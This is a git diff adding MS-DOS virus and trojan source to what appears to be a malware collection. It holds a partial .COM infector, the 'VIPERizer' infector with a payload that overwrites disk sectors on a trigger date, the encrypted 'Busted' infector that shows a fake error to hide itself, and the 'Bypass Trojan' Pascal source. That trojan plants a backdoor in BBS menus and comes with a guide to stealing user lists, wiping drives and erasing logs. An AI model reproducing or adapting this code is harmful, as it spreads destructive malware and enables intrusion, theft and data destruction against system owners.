find_next_subdir + +; Select found directory. + +use_next_subdir: + mov ah,2fh ; get dta address + int 21h + add bx,1ch + mov es:[bx],'\ ' ; address of name in dta + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3bh ; change path + int 21h + pop ds + mov bx,cs:counter + inc bx + mov CS:counter,bx + +; Find first .COM file in the current directory. +; If there are none, search the next directory. + +find_first_file: + mov ah,04eh ; Search for first + mov cx,00000001b ; mask + lea dx,maske_com + int 21h + jc find_first_subdir + jmp check_if_ill + +; If the program is already infected, search for +; the next program. + +find_next_file: + mov ah,4fh ; search for next + int 21h + jc find_first_subdir + +; Check if already infected by the virus. + +check_if_ill: + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + mov bx,ax ; save channel + mov ah,3fh ; read file + mov cx,buflen + mov dx,buffer ; write in buffer + int 21h + mov ah,3eh ; close file + int 21h + +; Here we search for the three NOP's. +; If present, there is already infection. We must +; then continue the search. + + mov bx,cs:offset[buffer] ; added A86 compatibility + cmp bx,9090h + jz find_next_file + +; Bypass MS-DOS write protection if present + + mov ah,43h ; write enable + mov al,0 + mov dx,9eh ; address of name in dta + int 21h + mov ah,43h + mov al,01h + and cx,11111110b + int 21h + +; Open file for read/write access. + + mov ah,3dh ; open channel + mov al,02h ; read/write + mov dx,9eh ; address of name in dta + int 21h + +; Read date entry of program and save for future use. + + mov bx,ax ; channel + mov ah,57h ; get date + mov al,0 + int 21h + push cx ; save date + push dx + +; The jump located at address 0100h of the program +; will be saved for future use. + + mov dx,cs:[conta] ; save old jmp + mov cs:offset[jmpbuf],dx ; added A86 compatibility + mov dx,cs:[buffer+1] ; save new jump + lea cx,cont-100h + sub dx,cx + mov cs:[conta],dx + +; The virus copies itself to the start of the file. + + mov ah,40h ; write virus + mov cx,buflen ; length buffer + lea dx,main ; write virus + int 21h + +; Enter the old creation date of the file. + + mov ah,57h ; write date + mov al,1 + pop dx + pop cx ; restore date + int 21h + +; Close the file + + mov ah,3eh ; close file + int 21h + +; Restore the old jump address. +; The virus saves at address "conta" the jump which +; was at the start of the host program. +; This is done to preserve the executability of the +; host program as much as possible. +; After saving it still works with the jump address +; contained in the virus. The jump address in the +; virus differs from the jump address in memory. + + mov dx,cs:offset[jmpbuf] ; restore old jmp - A86 compat. + mov cs:[conta],dx + +hops: + nop + call use_old + +; Continue with the host program. + +cont db 0e9h ; make jump +conta dw 0 + mov ah,00 + int 21h + +; Reactivate the selected drive at the start of the +; program. + +use_old: + mov ah,0eh ; use old drive + mov dl,cs:drive + int 21h + +; Reactivate the selected path at the start of the +; program. + + mov ah,3bh ; use old dir + lea dx,old_path-1 ; get old path and backslash + int 21h + ret + +search_order db 0ffh,1,0,2,3,0ffh,00,0ffh +pointer dw 0000 ; pointer f. search order +counter dw 0000 ; counter f. nth. search +disks db 0 ; number of disks + +maske_com db "*.com",00 ; search for com files +maske_dir db "*",00 ; search for dir's +maske_exe db 0ffh,0,0,0,0,0,00111111b + db 0,"????????exe",0,0,0,0 + db 0,"????????com",0 +maske_all db 0ffh,0,0,0,0,0,00111111b + db 0,"???????????",0,0,0,0 + db 0,"????????com",0 + +buffer equ 0e000h ; a safe place + +buflen equ 230h ; length of virus !!!!!!! + ; careful + ; if changing !!!!!!! + +jmpbuf equ buffer+buflen ; a safe place for jmp +path db "\",0 ; first path +drive db 0 ; actual drive +back_slash db "\" +old_path db 32 dup(?) ; old path + +code ends + +end main diff --git a/MSDOS/Virus.MSDOS.Unknown.bush.asm b/MSDOS/Virus.MSDOS.Unknown.bush.asm new file mode 100644 index 00000000..087b3e95 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.bush.asm @@ -0,0 +1,413 @@ +; +; VIPERizer, Strain B +; Copyright (c) 1992, Stingray/VIPER +; This is a Viral Inclined Programming Experts Ring Programming Team Production +; +; VIPER are: Stingray, Venom, and Guido Sanchez +; + +MOV_CX MACRO X ; Here is just a simple "mov cx,xxxx" macro. + DB 0B9H + DW X +ENDM + +CODE SEGMENT + ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + ORG $+0100H + +VCODE: JMP virus + + NOP ; just a dud for the 'infected' file. + +v_start equ $ + + +virus: PUSH CX + mov ax,0ff0fh ; Thanks to RABID... Change Mem Marker + int 21h + cmp ax,101h ; Is VirexPC/FluShit in memory? + jne more_virus ; Nope. + jmp quit ; FUCK!!!!! +more_virus: + MOV DX,OFFSET vir_dat ;This is where the virus data starts. + ; The 2nd and 3rd bytes get modified. + CLD ;Pointers will be auto INcremented + MOV SI,DX ;Access data as offset from SI + ADD SI,first_3 ;Point to original 1st 3 bytes of .COM + MOV DI,OFFSET 100H ;`cause all .COM files start at 100H + mov cx,3 + REPZ MOVSB ;Restore original first 3 bytes of .COM + MOV SI,DX ;Keep SI pointing to the data area + + MOV AH,30H + INT 21H + nop + CMP AL,0 ;0 means it's version 1.X + JNZ dos_ok ;For version 2.0 or greater + JMP quit ;Don't try to infect version 1.X +dos_ok: + mov ah,2ch ; Get Time + int 21h ; Do it. + xor bx,bx ; VIPERize bx, for later use. + cmp dl,4 ; hund's of seconds 4? + jle print_message ; If 4 or less, print a message. + ; This serves as a random 1 in 20 + ; chance of the message printing + jmp short get_date ; No? What date is it...? +print_message: + mov dl, byte ptr [si+msg+bx] ; Get a byte of our message... + or dl,dl ; is it 0? (end of message) + jz get_date ; Get the date if it is... + sub dl,75 ; Unencrypt message + mov ah,2 ; Prepare to print one letter + int 21h ; do it! + inc bx ; point to next character. + jmp short print_message ; Do it again. +get_date: + mov ah,2ah ; What day is it? + int 21h ; Find out. + cmp dh,3 ; Is it february? + jne resume ; No? Oh well. + cmp dl,24 ; Is it valentines day? + jne resume ; No? Damn. + mov ah,2ch ; What time is it? + int 21h ; Find out. + cmp ch,7 ; Is it 7 hours? + jne resume ; No? C'est la vie... + cmp cl,45 ; Is it 45 minutes? + jne resume ; No? Too Bad... + xor bx,bx ; VIPERize bx +cool: + mov dl,byte ptr [si+msg2+bx] ; This is pretty much the + or dl,dl ; same as the above 'print' + jz no_mas ; function. except I didn't + sub dl,75 ; make it a procedure. + mov ah,2 + int 21h + inc bx + jmp short cool +no_mas: + mov al,0 ; Start with drive default +phri: + mov cx,255 ; Nuke a few sectors + mov dx,1 ; Beginning with sector 1!!! + int 26h ; VIPERize them!!!! Rah!!! + jc error ; Uh oh. Problem. + add sp,2 ; Worked great. Clear the stack... +error: + inc al ; Get another drive! + cmp al,200 ; Have we fried 200 drives? + je done_phrying ; Yep. + jmp short phri ; Nope. +done_phrying: + cli ; Disable Interrupts + hlt ; Lock up computer. +resume: + PUSH ES + MOV AH,2FH + INT 21H + nop + MOV [SI+old_dta],BX + MOV [SI+old_dts],ES ;Save the DTA address + POP ES + MOV DX,dta ;Offset of new DTA in virus data area + nop + ADD DX,SI ;Compute DTA address + MOV AH,1AH + INT 21H ;Set new DTA to inside our own code + nop + PUSH ES + PUSH SI + MOV ES,DS:2CH + MOV DI,0 ;ES:DI points to environment +find_path: + POP SI + PUSH SI ;Get SI back + ADD SI,env_str ;Point to "PATH=" string in data area + LODSB + nop + MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long + REPNZ SCASB ;Search for first character + MOV CX,4 +check_next_4: + LODSB + SCASB + JNZ find_path ;If not all there, abort & start over + nop + LOOP check_next_4 ;Loop to check the next character + POP SI + POP ES + nop + MOV [SI+path_ad],DI ;Save the address of the PATH + MOV DI,SI + ADD DI,wrk_spc ;File name workspace + nop + MOV BX,SI ;Save a copy of SI + ADD SI,wrk_spc ;Point SI to workspace + MOV DI,SI ;Point DI to workspace + JMP SHORT slash_ok +set_subdir: + CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? + JNZ found_subdir ;If not, there are more subdirectories + JMP all_done ;Else, we're all done +found_subdir: + PUSH DS + PUSH SI + MOV DS,ES:2CH ;DS points to environment segment + nop + MOV DI,SI + MOV SI,ES:[DI+path_ad] ;SI = PATH address + ADD DI,wrk_spc ;DI points to file name workspace +move_subdir: + LODSB ;Get character + CMP AL,';' ;Is it a ';' delimiter? + JZ moved_one ;Yes, found another subdirectory + nop + CMP AL,0 ;End of PATH string? + JZ moved_last_one ;Yes + STOSB ;Save PATH marker into [DI] + JMP SHORT move_subdir +moved_last_one: + xor si,si +moved_one: + POP BX ;Pointer to virus data area + POP DS ;Restore DS + MOV [BX+path_ad],SI ;Address of next subdirectory + NOP + CMP CH,'\' ;Ends with "\"? + nop + JZ slash_ok ;If yes + MOV AL,'\' ;Add one, if not + STOSB +slash_ok: + MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace + MOV SI,BX ;Restore SI + ADD SI,f_spec ;Point to "*.COM" + MOV CX,6 + nop + REPZ MOVSB ;Move "*.COM",0 to workspace + MOV SI,BX + MOV AH,4EH + MOV DX,wrk_spc + ADD DX,SI ;DX points to "*.COM" in workspace + MOV CX,3 ;Attributes of Read Only or Hidden OK + INT 21H + nop + JMP SHORT find_first +find_next: + MOV AH,4FH + INT 21H + nop +find_first: + JNB found_file ;Jump if we found it + JMP SHORT set_subdir ;Otherwise, get another subdirectory +found_file: + MOV AX,[SI+dta_tim] ;Get time from DTA + AND AL,1FH ;Mask to remove all but seconds + CMP AL,1FH ;62 seconds -> already infected + JZ find_next ;If so, go find another file + CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? + nop + JA find_next ;If too long, find another one + CMP WORD PTR [SI+dta_len],0AH ;Is it too short? + JB find_next ;Then go find another one + MOV DI,[SI+nam_ptr] ;DI points to file name + PUSH SI ;Save SI + ADD SI,dta_nam ;Point SI to file name +more_chars: + LODSB + STOSB + CMP AL,0 + JNZ more_chars ;Move characters until we find a 00 + POP SI + MOV AX,OFFSET 4300H + nop + MOV DX,wrk_spc ;Point to \path\name in workspace + ADD DX,SI + INT 21H + nop + MOV [SI+old_att],CX ;Save the old attributes + MOV AX,OFFSET 4301H ;Set attributes + AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) + nop + MOV DX,wrk_spc ;Offset of \path\name in workspace + ADD DX,SI ;Point to \path\name + INT 21H + nop + MOV AX,OFFSET 3D02H ;Read/Write + nop + MOV DX,wrk_spc ;Offset to \path\name in workspace + ADD DX,SI ;Point to \path\name + INT 21H + nop + JNB opened_ok ;If file was opened OK + JMP fix_attr ;If it failed, restore the attributes + +opened_ok: + MOV BX,AX + MOV AX,OFFSET 5700H + INT 21H + nop + MOV [SI+old_tim],CX ;Save file time + MOV [SI+ol_date],DX ;Save the date + MOV AH,3FH + nop + MOV CX,3 + MOV DX,first_3 + ADD DX,SI + INT 21H ;Save first 3 bytes into the data area + nop + JB fix_time_stamp ;Quit, if read failed + CMP AX,3 ;Were we able to read all 3 bytes? + JNZ fix_time_stamp ;Quit, if not + MOV AX,OFFSET 4202H + xor cx,cx + xor dx,dx + INT 21H + nop + JB fix_time_stamp ;Quit, if it didn't work + MOV CX,AX ;DX:AX (long int) = file size + SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) + MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction + nop + ADD CX,OFFSET c_len_y + MOV DI,SI ;Point DI to virus data area + SUB DI,OFFSET c_len_x + ;Point DI to reference vir_dat, at start of pgm + MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm + MOV AH,40H + MOV_CX virlen ;Length of virus, in bytes + nop + MOV DX,SI + SUB DX,OFFSET codelen ;Length of virus code, gives starting + ; address of virus code in memory + INT 21H + nop + JB fix_time_stamp ;Jump if error + CMP AX,OFFSET virlen ;All bytes written? + JNZ fix_time_stamp ;Jump if error + MOV AX,OFFSET 4200H + xor cx,cx + xor dx,dx + INT 21H + nop + JB fix_time_stamp ;Jump if error + MOV AH,40H + MOV CX,3 + nop + MOV DX,SI ;Virus data area + ADD DX,jmp_op ;Point to the reconstructed JMP + INT 21H + nop +fix_time_stamp: + MOV DX,[SI+ol_date] ;Old file date + nop + MOV CX,[SI+old_tim] ;Old file time + AND CX,OFFSET 0FFE0H + nop + OR CX,1FH ;Seconds = 31/30 min = 62 seconds + MOV AX,OFFSET 5701H + INT 21H + nop + MOV AH,3EH + INT 21H + nop +fix_attr: + MOV AX,OFFSET 4301H + MOV CX,[SI+old_att] ;Old Attributes + nop + MOV DX,wrk_spc + ADD DX,SI ;DX points to \path\name in workspace + INT 21H + nop +all_done: + PUSH DS + MOV AH,1AH + MOV DX,[SI+old_dta] + nop + MOV DS,[SI+old_dts] + INT 21H + nop + POP DS + nop +quit: + POP CX + XOR AX,AX + XOR BX,BX + xor cx,cx + XOR DX,DX + XOR SI,SI + MOV DI,OFFSET 0100H + PUSH DI + XOR DI,DI + RET 0FFFFH +vir_dat EQU $ +olddta_ DW 0 ;Old DTA offset +olddts_ DW 0 ;Old DTA segment +oldtim_ DW 0 ;Old Time +oldate_ DW 0 ;Old date +oldatt_ DW 0 ;Old file attributes +first3_ EQU $ + INT 20H + NOP +jmpop_ DB 0E9H ;Start of JMP instruction +jmpdsp_ DW 0 ;The displacement part +fspec_ DB '*.COM',0 +pathad_ DW 0 ;Path address +namptr_ DW 0 ;Pointer to start of file name +envstr_ DB 'PATH=' ;Find this in the environment +wrkspc_ DB 40h dup (0) +dta_ DB 16h dup (0) ;Temporary DTA goes here +dtatim_ DW 0,0 ;Time stamp in DTA +dtalen_ DW 0,0 ;File length in the DTA +dtanam_ DB 0Dh dup (0) ;File name in the DTA +reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 + +_msg db 158,186,189,189,196,107,191,179,180,190,107,174,186,184,187,192 + db 191,176,189,107,180,190,107,185,186,107,183,186,185,178,176,189 + db 107,186,187,176,189,172,191,180,186,185,172,183,107,175,192,176 + db 107,191,186,107,172,185,107,186,192,191,173,189,176,172,182,107 + db 186,177,088,141,192,190,179,180,190,179,180,189,186,088,147,172 + db 193,176,107,172,107,153,148,142,144,107,175,172,196,121,121,121 + db 088 + db 0 + +_msg2 db 161,148,155,144,157,180,197,176,189,119,107,158,191,189,172,180 + db 185,107,141,085,088 + db 115,174,116,107,124,132,132,125,119,107,158,191,180,185,178,189 + db 172,196,122,161,148,155,144,157,085,088 + db 147,172,187,187,196,107,161,172,183,176,185,191,180,185,176,190 + db 107,143,172,196,108,085,088 + db 0 + + +lst_byt EQU $ ;All lines that assemble into code are + ; above this one + +virlen = lst_byt - v_start ;Length, in bytes, of the entire virus +codelen = vir_dat - v_start ;Length of virus code, only +c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code +c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP +old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset +old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment +old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp +ol_date = oldate_ - vir_dat ;Displacement to old file date stamp +old_att = oldatt_ - vir_dat ;Displacement to old attributes +first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM +jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode +jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP +f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string +path_ad = pathad_ - vir_dat ;Displacement to the path address +nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer +env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string +wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace +dta = dta_ - vir_dat ;Displacement to the temporary DTA +dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA +dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA +dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA +reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code +msg = _msg - vir_dat ; Disp. to 1st msg +msg2 = _msg2 - vir_dat ; Disp. to 2nd msg + CODE ENDS +END VCODE + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.busted.asm b/MSDOS/Virus.MSDOS.Unknown.busted.asm new file mode 100644 index 00000000..88aa4403 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.busted.asm @@ -0,0 +1,225 @@ +cr equ 13 ; Carriage return ASCII code +lf equ 10 ; Linefeed ASCII code +tab equ 9 ; Tab ASCII code +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val1 db 00h ; Hold value to encrypt by here +encrypt_val2 db 00h + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov cx,handle ; Get the handle + push cx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,endvir-main ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov al,[bx] ; Get the current byte + xor al,encrypt_val1 ; Engage/disengage XOR scheme on it + mov [bx],al ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+(endvir-main) ; Are we at the end? + je xor_nd + mov al,[bx] + xor al,encrypt_val2 + mov [bx],al + inc bx + cmp bx,offset virus_code+(endvir-main) + jle xor_loop ; If not, do another cycle +xor_nd: + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Program too big to fit in memory$" +virus_msg db cr,lf,tab,"Busted!$" +virus_info db "This is based on Leprosy-B. Thanx PCM2" +viral_tag db "Busted, Strain A, version 1.0" +viral_tag_2 db "By 榾譆&罘辰$ (Psychogenius), September '91" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? + +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val1,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val1,dl ; Otherwise, save the new value + mov encrypt_val2,dh +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,4 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val1 ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? + je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,6 ; Are at least 6 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? + jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + MOV DX, OFFSET virus_msg ; Print "Busted!" + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program +endvir LABEL BYTE + +main endp +code ends + end main + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + diff --git a/MSDOS/Virus.MSDOS.Unknown.bypass.asm b/MSDOS/Virus.MSDOS.Unknown.bypass.asm new file mode 100644 index 00000000..9468b8de --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.bypass.asm @@ -0,0 +1,220 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +哪哪哪哪哪哪哪哪哪哪哪> Bypass Trojan v1.0 and v2.0 : + + Created by: Mechanix + Released : October 1991 + + Introduction: + + Well this is basically another backdoor creator for Telegard Systems. This + one is relatively fullproof except for the fact that it requires REMOTE.BAT to + exist on the target system, or it will not function properly. However, the + Bypass Trojan v2.0 takes care of this problem as it creates REMOTE.BAT on the + target system, if it doesn't exist already. This is why I am also releasing + the source (in Turbo Pascal) to the Bypass Trojan v1.0. You will find the + source after the description. + + Description: + + This trojan will scan all directories on drives C: to E: in search of the + MAIN.MNU file. Then it will append a few lines to the file as to create a + hidden command to shell to DOS. It also checks to see if the MAIN.MNU file is + Read-Only or Hidden, and will remove these attributes long enough to make the + changes. It will also check for write-protection. The source can also be + changed as to modify any of the .MNU files. + + Notes: + + This trojan uses a basic Turbo Pascal cycle to scan all directories and + files, and thus the source can be modified for a number of uses. As for a good + procedure to nail the board once the shell to DOS command has been + implemented, I recommend the following: + - First and foremost, use a PBX or other phreaking trick to avoid the + annoying Maestro phone. + - Call preferably around 4-5 am, when the SysOp is almost sure not to be + around. + - Use the shuttle password (if there is one) and then apply as a NEW user + after you have bypassed the shuttle password. This will usually bypass CBV + utilities. + - Shell to DOS in the correct menu. + - Turn your capture mode on, as to record everything you see. + - Go get the user list and ZIP it up with another ZIP file that is already + online. This way you can D/L it later when you log on again. Or capture it + through a text file viewing utility if you find one on the system. + - If you don't want the user list, and just want to crash the board, then + FORMAT C: should do the trick. Or uses DEBUG to rearrange his FATs. Or if + it's a H/P board, use one of the online virii or trojans to screw him. That + will teach him, and you get to test them out. + - If you decide to only take the user list and let the board live, then go + edit the logs as to remove all evidence of your actions. If there's a spool + to printer log, you're in trouble. + - If you could not bypass CBV, then find that utility's log and edit out + your number. + - Lastly, take off the DOS shell command from the menu you modified in the + first place, unless you want to use it again, but this is risky. + + Well that's the method I've been using, but the choice is your's. + + + + + + Source: + +PROGRAM BYPASS1; +{ Bypass Trojan v1.0 } +{ Created by: M顩H掞!X [NuKE] } +{ Created on: 27/09/91 } +USES DOS; +VAR + Target : SEARCHREC; + T : TEXT; +PROCEDURE DIRECT (PATH : STRING); +VAR + PATH2 : STRING; + INFO : SEARCHREC; + INFO2 : SEARCHREC; + F : TEXT; +BEGIN + Findfirst (PATH + '\*.*',$10,INFO); + WHILE DOSERROR = 0 DO + BEGIN + IF (INFO.ATTR = $10) AND (INFO.NAME[1] <> '.') THEN + Begin + PATH2 := PATH + '\' + INFO.NAME; + Chdir (PATH2); + Findfirst ('MAIN.MNU',($3F - $10),INFO2); { Or any .MNU you wish } + WHILE DOSERROR = 0 DO + Begin + ASSIGN (F,INFO2.NAME); + Setfattr (F,$20); + Append (F); + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,'#'); { Key to add } + Writeln (F,' '); + Writeln (F,'-$'); + Writeln (F,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,' '); + Writeln (F,'#'); { Key to add } + Writeln (F,' '); + Writeln (F,'D-'); + Writeln (F,'REMOTE.BAT'); + Close (F); + Findnext(INFO2); + End; + DIRECT (PATH2); + End; + Findnext(INFO); + End; + END; +PROCEDURE FILEFIND (DRIVE : CHAR); +BEGIN + Chdir (DRIVE + ':\'); + Findfirst ('MAIN.MNU',($3F - $10),Target); { Or any .MNU you wish } + WHILE DOSERROR = 0 DO + Begin + ASSIGN (T,Target.name); + Setfattr (T,$20); + {$I-} + Append (T); + {$I+} + IF IORESULT = 0 THEN + Begin + Writeln (T,' '); + Writeln (T,'#'); { Key to add } + Writeln (T,' '); + Writeln (T,'-$'); + Writeln (T,'NUKEWAR;PW: ;^8WRONG - access denied!'); { Password } + Writeln (T,' '); + Writeln (T,' '); + Writeln (T,' '); + Writeln (T,'#'); { Key to add } + Writeln (T,' '); + Writeln (T,'D-'); + Writeln (T,'REMOTE.BAT'); + Close (T); + End + ELSE + Exit; + Findnext (Target); + End; + DIRECT (DRIVE + ':'); +END; +BEGIN + {$I-} + Chdir ('C:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('C'); + {$I-} + Chdir ('D:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('D'); + {$I-} + Chdir ('E:\'); + {$I+} + IF IORESULT = 0 THEN + FILEFIND ('E'); +END. + + Well there it is. Please feel free to improve it in anyway you like. I will + soon release the source to Bypass Trojan v2.0 which checks for REMOTE.BAT and + creates one if needed. The REMOTE.BAT file also has the Hidden attribute to + try and hide it from the SysOp. The reason for this, is that smart SysOps, and + any of those who are reading this, rename the REMOTE.BAT or remove it, to + avoid this sort of trojan. The original release is for a modem on Com2. If you + wish to have the trojan for another device, either edit it in the .EXE, or + contact me (Mechanix) on any [NuKE] board, and I will recompile the source for + you with another device. + + Mechanix [NuKE] + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V 